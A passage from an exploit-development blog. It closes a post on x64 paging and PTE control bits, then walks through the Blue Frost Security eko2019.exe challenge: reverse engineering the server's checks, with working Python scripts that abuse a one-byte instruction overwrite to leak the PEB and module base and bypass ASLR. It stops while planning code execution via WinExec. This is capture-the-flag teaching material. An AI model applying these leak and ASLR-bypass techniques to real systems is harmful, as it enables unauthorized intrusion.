For each physical memory page the MMU wants to attribute to a virtual memory page, the MMU will access an entry from each table (a page table entry) that will “lead us” to the next paging structure in line.This process will go on, until a final 4 KB physical page (more on this later) is retrieved.

Think of it as needing to pick a specific entry from each table to reach our final 4 KB physical memory page. We will get into some very high level mathematical computations on how this is done later, and seeing the exact anatomy of a virtual address in WinDbg.

Now that we have some high level understanding of the various paging structures, and before diving into the paging structures and the CR3 register (PML4, I am looking at you)- let’s circle back to bits 63-48, which are represented as “Sign Extend

Canonical Addressing

In a 64-bit architecture, each virtual memory address has a total of 8 bytes, compared to a 4 byte x86 virtual memory address.

Referring back to the above section, we can recall that bits 63-48 are not accessing any paging structures. What is the purpose of this? It has to do with the limitations of the MMU.

Technically, a 64-bit system only uses 48 bits of its total power. This is because if a 64-bit system allowed all 64 bits to be addressed, the system would need to be able to address 16 exabytes of total virtual memory. 1 exabyte is equivalent to 1000000 terabytes (TB). The MMU would not be able to keep track of all of this from a translations perspective firstly (efficiently), and secondly (and most importantly) systems today cannot support this much virtual memory.

The CPU implements a “governor” of sorts, which limits 64-bit addresses to 48-bit addresses. An address in which bits 63-47 are sign extended is known as a canonical address.

Sign extending bits 63-47 limits the virtual address space to 256 TB of RAM. This is still a lot, but it is still feasible.

Let’s take a look to see how this all breaks down.

Referencing the Intel manual again, sign extending occurs in the following manner. Bit 47 is responsible for what bits 63-47 will be set to.

If bit 47 is set to 0, bits 63-48 will also be set to 0. If bit 47 is set to 1, bits 63-48 will be set to 1 (resulting in hexadecimal F’s in the virtual address).

The below chart, from Intel shows what addresses are valid and what addresses are invalid, in accordance with canonical addressing and sign extending. Note that we are only interested in the 48-bit addressing chart. 56-bit addressing refers to level 5 paging and 64-bit addressing refers to using the whole 64-bit address space.

Let’s look at two examples below.

The first example is the address KERNELBASE!VirtualProtect which has a virtual memory address of 00007ffce032cfc0. Breaking the address down into binary, we can see bit 47 is set to 0. Subsequently, bits 63-48 are also set to 0.

Generally, user mode addresses are going to be sign extended with a 0.

Taking a look at a kernel mode address, nt!MiGetPteAddress, we can see in this case bit 47 is set to 1. Meaning bits 63-48 are also set to 1, resulting in all hexadecimal F’s occuring in the virtual address as seen below.

Now that we see how addressing is limited, let’s get into the breakdown of a virtual address.

(Question to you, the reader. Now that we know 64-bit systems only utilize 48 bits, do you see a clear need for 128-bit processors in the near future?)

The Anatomy of a Virtual Address (In All of Its Glory)

Let’s talk about paging structures and page table entries once again before we get into breaking down a virtual address.

Recall there are 4 main paging structures:

  1. Page-Map Level-4 Table (PML4)
  2. Page-Directory-Pointer Table (PDPT)
  3. Page-Directory Table (PDT)
  4. Page Table (PT)

As a point of contention, a page table entry for each of these structures removes the “T” from the acronym and replaces it with an “E”. For instance, an entry from the PDT is known as a PDE. An entry from the PT is known as a PTE and so on.

Recall that each one of these structures is a table that has 512 entries each. One PML4E can address up to 512 GB of memory. One PDPE can address 1 GB. One PDE can address 2 MB. Finally, one PTE can map 4 KB, or a physical memory page.

Note that the actual size of each entry is 8 bytes (the size of a virtual memory address in a 64-bit architecture).

Let’s talk about PML4 table briefly, which cannot be talked about without mentioning the CR3 register.

The CR3 register actually contains a physical memory address, which actually serves as the PML4 table base. This can be seen in the image below, where CR3 loads an actualy physical memory address.

This is how the paging process begins, as the PML4 can be fetched from the CR3 register.

Again, to reiterate, The PML4 (via the CR3 register) indexes the PDPT table and fetches an entry. The PDPT indexes the base of the PDT table and fetches an entry. The PDT table indexes the PT table and fetches a 4 KB physical memory page.

Before moving on, there is one special thing to note, and that is the actual page table (PT).

Once the page table (PT) has been indexed in bits 20-12, bits 11-0 no longer need to fetch an index from any other paging structures. Bits 11-0 actually serve as an offset to a physical memory page 4 KB in size. Recall that an offset is the distance between two places (generally from a base, the PT in this case, to another location). Bits 11-0 simply serve as the actual distance from the page table base to the actual location of the physical memory. We will see this outlined very shortly when we perform a page translation in WinDbg.

Now that we understand at a bit of a lower level how each paging structure is indexed, let’s take it an even lower level.

Finally, an Example!

VirtualAlloc() is a routine in Windows that creates a region of virtual memory and returns a pointer to this virtual memory.

In our example, the virtual memory address 510000 is a virtual memory address that was created by KERNELBASE!VirtualAlloc. Let’s run the !pte command in WinDbg to see what we are working with here.

One thing to notate before moving on, WinDbg references a few paging structures and entries a bit differently. Namely, they are:

  1. PXE = PML4E
  2. PPE = PDPE

Moving on, we can see each structure’s entries can all be found at their respective virtual addresses, shown above as:

  1. PML4E at FFFFF6FB7DBED000
  2. PDPE at FFFFF6FB7DA00000
  3. PDTE at FFFFF6FB40000010
  4. PTE at FFFFF68000002880

This is because the !pte output converts the entries to virtual addresses before being displayed. We don’t care so much about the virtual addresses (for the time being) because we are trying to see how virtual addresses are converted into physical addresses.

In order to reach our goal, right now we only care about pfn which we can see from the !pte output. Let’s understand the pfn means firstly, as this will help us understand the output of !pte and fetching a physical page associated with a virtual page.

A PFN, or page frame number, refers to the next paging structure in the hierarchy. PFNs work with PTEs, in that PTEs fetch the PFN for the next paging structure. That PFN is then multiplied by 0x1000 (4 KB) to retrieve the physical address of the next paging structure. We will hit more on this now.

In the output of !pte we see there is a PML4E. A PML4E , as we know, will fetch the base address of the PDPT table. From there, it will index an entry from the next table, known as a PDPE.

The PFN, as we can see from the output in WinDbg in the earlier screenshot, that PML4 is using to index the PDPT table is 7bbc8. This means this should be the page frame number for the PDPT, as we know a page frame number refers to the next paging structure in the hierarchy.

We will now use !vtop to convert the PDPT to a physical address to verify that the PML4E entry is indexing the correct paging structure.

Let’s breakdown this command firstly.

The 7be59000 value in the above command is the base paging structure in the CR3 register, the PML4 physical address. When using !vtop, you use this address to specify the base paging structure. After that, we have the virtual address we want to convert.

As we can see, the PDPT is located at a physical address of 7bbc8000! This is perfect, because this is the PFN value used by the PML4 structure to index the next paging structure, PDPT. Recall earlier, that we multiply the PFN (7bbc8 in this case) by 0x1000, which gives us a physical memory address of 7bbc8000- which represents the PDPT.

Let’s verify in WinDbg with !dd, which will dump physical memory, that the virtual address of the PDPE and the physical address both are the same.

As we can see, the physical and virtual memory addresses contain the same values.

Too Many Acronyms!

This is an ideal example to show that a physical page of memory is actually NOTHING MORE than a PFN multipiled by 0x1000 and an offset to the physical memory page! A PFN, as we can recall, is a reference to the base of the next paging structure.

Since we converted the PDPT address (which is a base address to begin with), there was no offset in the physical translation, meaning that the PFN was appended with 0’s.

This is mainly because we were fetching the base address of a paging structure, which means it won’t be offset from anything.

If our virtual address would have been FFFFF6FB7DA00008, for instance, our physical address would have been 7bbc8008. This is because the address is at an offset of 0x8 from the base of the PFN!

Awesome, we know know what a physical memory address looks like at a high level. But each entry in a paging structure (a PTE) contains more metadata. What does this metadata look like and how is it useful?

PTEs- For Real This Time

Let’s take a look back at an image that was already displayed, in the !pte output.

More specifically, let’s take a look at the PTE entry, furthest to the right.

PTE at FFFFF68000002880
contains 7A9000007BBA9867
pfn 7bba9     ---DA--UWEV

Let’s take a look at the entry, more specifically the contains line which contains 7A9000007BBA9867.

We can clearly see the PFN here, in between the 7A900000 and 867. But what do these other numbers mean? Additionally, what does ---DA--UWEV mean? These refer to “control bits”, which provision various permissions, features, etc to the memory page. Let’s take a look at each of these bits.

Here are a list of some of the possible control bits. These bits are the ones we care about, and it is not an exhaustive list.

  1. P- The PTE is valid if this bit is set
  2. R/W - Writing is enabled if this bit is set
  3. U/S - If this bit is set, the page is a user mode page. If this bit is clear, the page is a supervisor (kernel) mode page
  4. D - If this bit is set, a write has been made to this page, making it a “dirty” page
  5. A - If this bit is set, this memory page has been referenced at some point

Mouth Of The River

Again, this was by no means meant to be an exhaustive and comprehensive “tell all” of memory paging. This article barely scratched the surface. However, understanding things like control bits and virtual memory and having that as prerequisite knowledge allows you to understand bypassing mitigations such as NX in kernel pool memory, or more ways of bypassing SMEP. The next post will go into bypassing SMEP and NX in the kernel by way of the prerequisite knowledge laid out here.

You know the drill, any comments, questions, corrections, feel free to reach out to me. Until then!

Peace, love, and positivity! :-)

Exploit Development: Rippity ROPpity The Stack Is Our Property - Blue Frost Security eko2019.exe Full ASLR and DEP Bypass on Windows 10 x64

27 March 2020 at 00:00

Introduction

I recently have been spending the last few days working on obtaining some more experience with reverse engineering to complement my exploit development background. During this time, I stumbled across this challenge put on by Blue Frost Security earlier in the year- which requires both reverse engineering and exploit development skills. Although I would by no means consider myself an expert in reverse engineering, I decided this would be a nice way to try to become more well versed with the entire development lifecycle, starting with identifying vulnerabilities through reverse engineering to developing a functioning exploit.

Before we begin, I will be using using Ghidra and IDA Freeware 64-bit to reverse the eko2019.exe application. In addition, I’ll be using WinDbg to develop the exploit. I prefer to use IDA to view the execution of a program- but I prefer to use the Ghidra decompiler to view the code that the program is comprised of. In addition to the aforementioned information, this exploit will be developed on Windows 10 x64 RS2, due to the fact the I already had a VM with this OS ready to go. This exploit will work up to Windows 10 x64 RS6 (1903 build), although the offsets between addresses will differ.

Reverse, Reverse!

Starting the application, we can clearly see the server has echoed some text into the command prompt where the server is running.

After some investigation, it seems this application binds to port 54321. Looking at the text in the command prompt window leads me to believe printf(), or similar functions, must have been called in order for the application to display this text. I am also inclined to believe that these print functions must be located somewhere around the routine that is responsible for opening up a socket on port 54321 and accepting messages. Let’s crack open eko2019.exe in IDA and see if our hypothesis is correct.

By opening the Strings subview in IDA, we can identify all of the strings within eko2019.exe.

As we can see from the above image, we have identified a string that seems like a good place to start! "[+] Message received: %i bytes\n" is indicative that the server has received a connection and message from the client (us). The function/code that is responsible for incoming connections may be around where this string is located. By double-clicking on .data:000000014000C0A8 (the address of this string), we can get a better look at the internals of the eko2019.exe application, as shown below.

Perfect! We have identified where the string "[+] Message received: %i bytes\n" resides. In IDA, we have the ability to cross reference where a function, routine, instruction, etc. resides. This functionality is outlined by DATA XREF: sub_1400011E0+11E↑o comment, which is a cross reference of data in this case, in the above image. If we double click on sub_1400011E0+11E↑o in the DATA XREF comment, we will land on the function in which the "[+] Message received: %i bytes\n" string resides.

Nice! As we can see from the above image, the place in which this string resides, is location (loc) loc_1400012CA. If we trace execution back to where it originated, we can see that the function we are inside is sub_1400011E0 (eko2019.exe+0x11e0).

After looking around this function for awhile, it is evident this is the function that handles connections and messages! Knowing this, let’s head over to Ghidra and decompile this function to see what is going on.

Opening the function in Ghidra’s decompiler, a few things stand out to us, as outlined in the image below.

Number one, The local_258 variable is initialized with the recv() function. Using this function, eko2019.exe will “read in” the data sent from the client. The recv() function makes the function call with the following arguments:

  • A socket file descriptor, param_1, which is inherited from the void FUN_1400011e0 function.
  • A pointer to where the buffer that was received will be written to (local_28).
  • The specified length which local_28 should be (0x10 hexadecimal bytes/16 decimal bytes).
  • Zero, which represents what flags should be implemented (none in this case).

What this means, is that the size of the request received by the recv() function will be stored in the variable local_258.

This is how the call looks, disassembled, within IDA.

The next line of code after the value of local_258 is set, makes a call to printf() which displays a message indicating the “header” has been received, and prints the value of local_258.

printf(s__[+]_Header_received:_%i_bytes_14000c008,(ulonglong)local_258)

We can interpret this behavior as that eko2019.exe seems to accept a header before the “message” portion of the client request is received. This header must be 0x10 hexadecimal bytes (16 decimal bytes) in length. This is the first “check” the application makes on our request, thus being the first “check” we must bypass.

Number two, after the header is received by the program, the specific variable that contains the pointer to the buffer received by the previous recv() request (local_28) is compared to the string constant 0x393130326f6b45, or Eko2019 in text form, in an if statement.

if (local_28 == 0x393130326f6b45) {

Taking a look at the data type of the local_28, declared at the beginning of this function, we notice it is a longlong. This means that the variable should 8 bytes in totality. We notice, however, that 0x393130326f6b45 is only 7 bytes in length. This behavior is indicatory that the string of Eko2019 should be null terminated. The null character will provide the last byte needed for our purposes.

This is how this check is executed, in IDA.

Number three, is the variable local_20’s size is compared to 0x201 (513 decimal).

if (local_20 < 0x201) {

Where does this variable come from you ask? If we take a look two lines down, we can see that local_20 is used in another recv() call, as the length of the buffer that stores the request.

local_258 = recv(param_1,local_238,(uint)(ushort)local_20,0);

The recv() call here again uses the same type of arguments as the previous call and reuses the variable local_258. Let’s take a look at the declaration of the variable local_238 in the above recv() function call, as it hasn’t been referenced in this blog post yet.

char local_238 [512];

This allocates a buffer of 512 bytes. Looking at the above recv() call, here is how the arguments are lined up:

  • A socket file descriptor, param_1, which is inherited from the void FUN_1400011e0 function is used again.
  • A pointer to where the buffer that was received will be written to (local_238 this time, which is 512 bytes).
  • The specified length, which is represented by local_20. This variable was used in the check implemented above, which looks to see if the size of the data recieved in the buffer is 512 bytes or less.
  • Zero, which represents what flags should be implemented (none in this case).

The last check looks to see if our message is sent in a multiple of 8 (aka aligned properly with a full 8 byte address). This check can be identified with relative ease.

uVar2 = (int)local_258 >> 0x1f & 7;
if ((local_258 + uVar2 & 7) == uVar2) {
          iVar1 = printf(s__[+]_Remote_message_(%i):_'%s'_14000c0f8,(ulonglong)DAT_14000c000, local_238);

The size of local_258, which at this point is the size of our message (not the header), is shifted to the right, via the bitwise operator >>. This value is then bitwise AND’d with 7 decimal. This is what the result would look like if our message size was 0x200 bytes (512 decimal), which is a known multiple of 8.

This value gets stored in the uVar2 variable, which would now have a value of 0, based on the above photo.

If we would like our message to go through, it seems as though we are going to need to satisfy the above if statement. The if statement adds the value of local_258 (presumably 0x200 in this example) to the value of uVar2, while using bitwise AND on the result of the addition with 7 decimal. If the total result is equal to uVar2, which is 0, the message is sent!

As we can see, the statement local_258 + uVar2 == uVar2 is indeed true, meaning we can send our message!

Let’s try another scenario with a value that is not a multiple of 8, like 0x199.

Using the same forumla above, with the bitwise shift right operator, we yield a value of 0.

Taking this value of 0, adding it to 0x199 and using bitwise AND on the result- yields a nonzero value (1).

This means the if statement would have failed, and our message would not go have gone through (since 0x199 is not a multiple of 8)!

In total, here are the checks we must bypass to send our buffer:

  1. A 16 byte header (0x10 hexadecimal) with the string 0x393130326f6b45, which is null terminated, as the first 8 bytes (remember, the first 16 bytes of the request are interpreted as the header. This means we need 8 additional bytes appended to the null terminated string).
  2. Our message (not counting the header) must be 512 bytes (0x200 hexadecimal bytes) or less
  3. Our message’s length must be a multiple of 8 (the size of an x64 memory address)

Now that we have the ability to bypass the checks eko2019.exe makes on our buffer (which is comprised of the header and message), we can successfully interact with the server! The only question remains- where exactly does this buffer end up when it is received by the program? Will we even be able to locate this buffer? Is this only a partial write? Let’s take a look at the following snippet of code to find out.

local_250[0] = FUNC_140001170
hProcess = GetCurrentProcess();
WriteProcessMemory(hProcess,FUN_140001000,local_250,8,&local_260);

The Windows API function GetCurrentProcess() first creates a handle to the current process (eko2019.exe). This handle is passed to a call to WriteProcessMemory(), which writes data to an area of memory in a specified process.

According Microsoft Docs (formerly known as MSDN), a call to WriteProcessMemory() is defined as such.

BOOL WriteProcessMemory(
  HANDLE  hProcess,
  LPVOID  lpBaseAddress,
  LPCVOID lpBuffer,
  SIZE_T  nSize,
  SIZE_T  *lpNumberOfBytesWritten
);
  • hProcess in this case is will be set to the current process (eko2019.exe).
  • lpBaseAddress is set to the function inside of eko2019.exe, sub_140001000 (eko2019.exe+0x1000). This will be where WriteProcessMemory() starts writing memory to.
  • lpBuffer is where the memory written to lpBaseAddress will be taken from. In our case, the buffer will be taken from function sub_140001170 (eko2019.exe+0x1170), which is represented by the variable local_250.
  • nSize is statically assigned as a value of 8, this function call will write one QWORD.
  • *lpNumberOfBytesWritten is a pointer to a variable that will receive the number of bytes written.

Now that we have better idea of what will be written where, let’s see how this all looks in IDA.

There are something very interesting going on in the above image. Let’s start with the following instructions.

lea rcx, unk_14000E520
mov rcx, [rcx+rax*8]
call sub_140001170

If you can recall from the WriteProcessMemory() arguments, the buffer in which WriteProcessMemory() will write from, is actually from the function sub_140001170, which is eko2019.exe+0x1170 (via the local_250 variable). From the above assembly code, we can see how and where this function is utilized!

Looking at the assembly code, it seems as though the unkown data type, unk_14000E520, is placed into the RCX register. The value pointed to by this location (the actual data inside the unknown data type), with the value of RAX tacked on, is then placed fully into RCX. RCX is then passed as a function parameter (due to the x64 __fastcall calling convention) to function sub_140001170 (eko2019.exe+0x1170).

This function, sub_140001170 (eko2019.exe+0x1170), will then return its value. The returned value of this function is going to be what is written to memory, via the WriteProcessMemory() function call.

We can recall from the WriteProcessMemory() function arguments earlier, that the location to which sub_140001170 will be written to, is sub_140001000 (eko2019.exe+0x1000). What is most interesting, is that this location is actually called directly after!

call sub_140001000

Let’s see what sub_140001000 looks in IDA.

Essentially, when sub_140001000 (eko2019.exe+0x1000) is called after the WriteProcessMemory() routine, it will land on and execute whatever value the sub_140001170 (eko2019.exe+0x1170) function returns, along with some NOPS and a return.

Can we leverage this functionality? Let’s find out!

Stepping Stones

Now that we know what will be written to where, let’s set a breakpoint on this location in memory in WinDbg, and start stepping through each instruction and dumping the contents of the registers in use. This will give us a clearer understanding of the behavior of eko2019.exe

Here is the proof of concept we will be using, based on the checks we have bypassed earlier.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes
exploit += "\x41" * 512

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)
s.recv(1024)
s.close()

Before sending this proof of concept, let’s make sure a breakpoint is set at ek2010.exe+0x1330 (sub_140001330), as this is where we should land after our header is sent.

After sending our proof of concept, we can see we hit our breakpoint.

In addition to execution pausing, it seems as though we also control 0x1f8 bytes on the stack (504 decimal).

Let’s keep stepping through instructions, to see where we get!

After stepping through a few instructions, execution lands at this instruction, shown below.

lea rcx,[eko2019+0xe520 (00007ff6`6641e520)]

This instruction loads the address of eko2019.exe+0xe520 into RCX. Looking back, we recall the following is the decompiled code from Ghidra that corresponds to our current instruction.

lea rcx, unk_14000E520
mov rcx, [rcx+rax*8]
call sub_140001170

If we examine what is located at eko2019.exe+0xe520, we come across some interesting data, shown below.

It seems as though this value, 00488b01c3c3c3c3, will be loaded into RCX. This is very interesting, as we know that c3 bytes are that of a “return” instruction. What is of even more interest, is the first byte is set to zero. Since we know RAX is going to be tacked on to this value, it seems as though whatever is in RAX is going to complete this string! Let’s step through the instruction that does this.

RAX is currently set to 0x3e

The following instruction is executed, as shown below.

mov rcx, [rcx+rax*8]

RCX now contains the value of RAX + RCX!

Nice! This value is now going to be passed to the sub_140001170 (eko2019.exe+0x1170) function.

As we know, most of the time a function executes- the value it returns is placed in the accumulator register (RAX in this case). Take a look at the image below, which shows what value the sub_140001170 (eko2019.exe+0x1170) function returns.

Interesting! It seems as though the call to sub_140001170 (eko2019.exe+0x1170) inverted our bytes!

Based off of the research we have done previously, it is evident that this is the QWORD that is going to be written to sub_140001000 via the WriteProcessMemory() routine!

As we can see below, the next item up for execution (that is of importance) is the GetCurrentProcess() routine, which will return a handle to the current process (eko2019.exe) into RAX, similarly to how the last function returned its value into RAX.

Taking a look into RAX, we can see a value of ffffffffffffffff. This represents the current process! For instance, if we wanted to call WriteProcessMemory() outside of a debugger in the C programming language for example, specifying the first function argument as ffffffffffffffff would represent the current process- without even needing to obtain a handle to the current process! This is because technically GetCurrentProccess() returns a “pseudo handle” to the current process. A pseudo handle is a special constant of (HANDLE)-1, or ffffffffffffffff.

All that is left now, is to step through up until the call to WriteProcessMemory() to verify everything will write as expected.

Now that WriteProcessMemory() is about to be called- let’s take a look at the arguments that will be used in the function call.

The fifth argument is located at RSP + 0x20. This is what the __fastcall calling convention defaults to after four arguments. Each argument after 5th will start at the location of RSP + 0x20. Each subsequent argument will be placed 8 bytes after the last (e.g. RSP + 0x28, RSP + 0x30, etc. Remember, we are doing hexadecimal math here!).

Awesome! As we can see from the above image, WriteProcessMemory() is going to write the value returned by sub_140001170 (eko2019.exe+0x1170), which is located in the R8 register, to the location of sub_140001000 (eko2019.exr+0x1000).

After this function is executed, the location to which WriteProcessMemory() wrote to is called, as outlined by the image below.

Cool! This function received the buffer from the sub_140001170 (eko2019.exe+0x1170) function call. When those bytes are interpreted by the disassembler, you can see from the image above- this 8 byte QWORD is interpreted as an instruction that moves the value pointed to by RCX into RAX (with the NOPs we previously discovered with IDA)! The function returns the value in RAX and that is the end of execution!

Is there any way we can abuse this functionality?

Curiosity Killed The Cat? No, It Just Turned The Application Into One Big Info Leak

We know that when sub_140001000 (eko2019.exe+0x1000) is called, the value pointed to by RCX is placed into RAX and then the function returns this value. Since the program is now done accepting and returning network data to clients, it would be logical that perhaps the value in RAX may be returned to the client over a network connection, since the function is done executing! After all, this is a client/server architecture. Let’s test this theory, by updating our proof of concept.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes
exploit += "\x41" * 512

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Can we receive any data back?
test = s.recv(1024)
test_unpack = struct.unpack_from('<Q', test)
test_index = test_unpack[0]

print "[+] Did we receive any data back from the server? If so, here it is: {0}".format(hex(test_index))

# Closing the connection
s.close()

What this updated code will do is read in 1024 bytes from the server response. Then, the struct.unpack_from() function will interpret the data received back in the response from the server in the form of an unsigned long long (8 byte integer basically). This data is then indexed at its “first” position and formatted into hex and printed!

If you recall from the previous image in the last section that outlined the mov rax, qword ptr [ecx] operation in the sub_140001000 function, you will see the value that was moved into RAX was 0x21d. If everything goes as planned, when we run this script- that value should be printed to the screen in our script! Let’s test it out.

Awesome! As you can see, we were able to extract and view the contents of the returned value of the function call to sub_140001000 (eko2019.exe+0x1000) remotely (aka RAX)! This means that we can obtain some type of information leakage (although, it is not particuraly useful at the moment).

As reverse engineers, vulnerability researchers, and exploit developers- we are taught never to accept things at face value! Although eko2019.exe tells us that we are not supposed to send a message longer than 512 bytes- let’s see what happens when we send a value greater than 512! Adhering to the restriction about our data being in a multiple of 8, let’s try sending 528 bytes (in just the message) to the server!

Interesting! The application crashes! However, before you jump to conclusions- this is not the result of a buffer overflow. The root cause is something different! Let’s now identify where this crash occurs and why.

Let’s reattach eko2019.exe to WinDbg and view the execution right before the call to sub_140001170 (eko2019.exe+0x1170).

Again, execution is paused right before the call to sub_140001170 (eko2019.exe+0x1170)

At this point, the value of RAX is about to be added to the following data again.

Let’s check out the contents of the RAX register, to see what is going to get tacked on here!

Very interesting! It seems as though we now actually control the byte in RAX- just by increasing the number of bytes sent! Now, if we step through the WriteProcessMemory() function call that will write this string and call it later on, we can see that this is why the program crashes.

As you can see, execution of our program landed right before the move instruction, which takes the contents pointed to by RCX and places it into RAX. As we can see below, this was not an access violation because of DEP- but because it is obviously an invalid pointer. DEP doesn’t apply here, because we are not executing from the stack.

This is all fine and dandy- but the REAL issue can be identified by looking at the state of the registers.

This is the exciting part- we actually control the contents of the RCX register! This essentially gives us an arbitrary read primtive due to the fact we can control what gets loaded into RCX, extract its contents into RAX, and return it remotely to the client! There are four things we need to take into consideration:

  1. Where are the bytes in our message buffer stored into RCX
  2. What exactly should we load into RCX?
  3. Where is the byte that comes before the mov rax, qword ptr [rcx] instruction located?
  4. What should we change said byte to?

Let’s address numbers three and four in the above list firstly.

Bytes Bytes Baby

In a previous post about ROP, we talked about the concept of byte splitting. Let’s apply that same concept here! For instance, \x41 is an opcode, that when combined with the opcodes \x48\x8b\x01 (which makes up the move instruction in eko2019.exe we are talking about) does not produce a variant of said instruction.

Let’s put our brains to work for a second. We have an information leak currently- but we don’t have any use for it at the moment. As is common, let’s leverage this information leak to bypass ASLR! To do this, lets start by trying to access the Process Environment Block, commonly referred to as the PEB, for the current process (eko2019.exe)! The PEB for a process is the user mode representation of a process, similarly to how _EPROCESS is the kernel mode representation of kernel mode objects.

Why is this relevant this you ask? Since we have the ability to extract the pointer from a location in memory, we should be able to use our byte splitting primitive to our advantage! The PEB for the current process can be accessed through a special segment register, GS, at an offset of 0x60. Recall from this previous of two posts about kernel shellcode, that a segment register is just a register that is used to access different types of data structures (such as the PEB of the current process). The PEB, as will be explained later, contains some very prudent information that can be leveraged to turn our information leak into a full ASLR bypass.

We can potentially replace the \x41 in front of our previous mov rax, qword ptr [rcx] instruction, and change it to create a variant of said instruction, mov rax, qword ptr gs:[rcx]! This would also mean, however, that we would need to set RCX to 0x60 at the time of this instruction.

Recall that we have the ability to control RCX at this time! This is ideal, because we can use our ability to control RCX to load the value of 0x0000000000000060 into it- and access the GS segment register at this offset!

After some research, it seems as though the bytes \x65\x48\x8b\x01 are used to create the instruction mov rax, qword ptr gs:[rcx]. This means we need to replace the \x41 byte that caused our access violation with a \x65 byte! Firstly, however, we need to identify where this byte is within our proof of concept.

Updating our proof of concept, we found that the byte we need to replace with \x65 is at an offset of 512 into our 528 byte buffer. Additionally, the bytes that control the value of RCX seem to come right after said byte! This was all found through trial and error.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

As you can see from the image below, when we hit the move operation and we have got the correct instruction in place.

RAX now contains the value of PEB!

In addition, our remote client has been able to save the PEB into a variable, which means we can always dynamically resolve this value. Note that this value will always change after the application (process) is restarted.

What is most devastating about identifying the PEB of eko2019.exe, is that the base address for the current process (eko2019.exe in this case) is located at an offset of PEB+0x10

Essentially, all we have to do is use our ability to control RCX to load the value of PEB+0x10 into it. At that point, the application will extract that value into RAX (what PEB+0x10 points to). The data PEB+0x10 points to is the actual base virtual address for eko2019.exe! This value will then be returned to the client, via RAX. This will be done with a second request! Note that this time we do not need to access the GS segment register (in the second request). If you can recall, before we accessed the GS segment register, the program naturally executed a mov rax, qword ptr[rcx] instruction. To ensure this is the instruction executed this time, we will use our byte we control to implement a NOP- to slide into the intended instruction.

As mentioned earlier, we will close our first connection to the client, and then make a second request! This update to the exploit development process is outlined in the updated proof of concept.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 2nd stage

# 16 total bytes
print "[+] Sending the second header..."
exploit_2 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_2 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_2 += "\x90"

# Padding to loading PEB+0x10 into rcx
exploit_2 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_2 += struct.pack('<Q', peb_addr+0x10)

# Message needs to be 528 bytes total
exploit_2 += "\x41" * (544-len(exploit_2))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_2)

# Indexing the response to view RAX (Base VA of eko2019.exe)
receive_2 = s.recv(1024)
base_va_unpack = struct.unpack_from('<Q', receive_2)
base_address = base_va_unpack[0]

print "[+] The base address for eko2019.exe is located at: {0}".format(hex(base_address))

# Closing the connection
s.close()

We hit our NOP and then execute it, sliding into our intended instruction.

We execute the above instruction- and we see a virtual address has been loaded into RAX! This is presumably the base address of eko2019.exe.

To verify this, let’s check what the base address of eko2019.exe is in WinDbg.

Awesome! We have successfully extracted the base virtual address of eko2019.exe and stored it in a variable on the remote client.

This means now, that when we need to execute our code in the future- we can dynamically resolve our ROP gadgets via offsets- and ASLR will no longer be a problem! The only question remains- how are we going to execute any code?

Mom, The Application Is Still Leaking!

For this blog post, we are going to pop calc.exe to verify code execution is possible. Since we are going to execute calc.exe as our proof of concept, using the Windows API function WinExec() makes the most sense to us. This is much easier than going through with a full VirtualProtect() function call, to make our code executable- since all we will need to do is pop calc.exe.

Since we already have the ability to dynamically resolve all of eko2019.exe’s virtual address space- let’s see if we can find any addresses within eko2019.exe that leak a pointer to kernel32.dll (where WinExec() resides) or WinExec() itself.

As you can see below, eko2019.exe+0x9010 actually leaks a pointer to WinExec()!

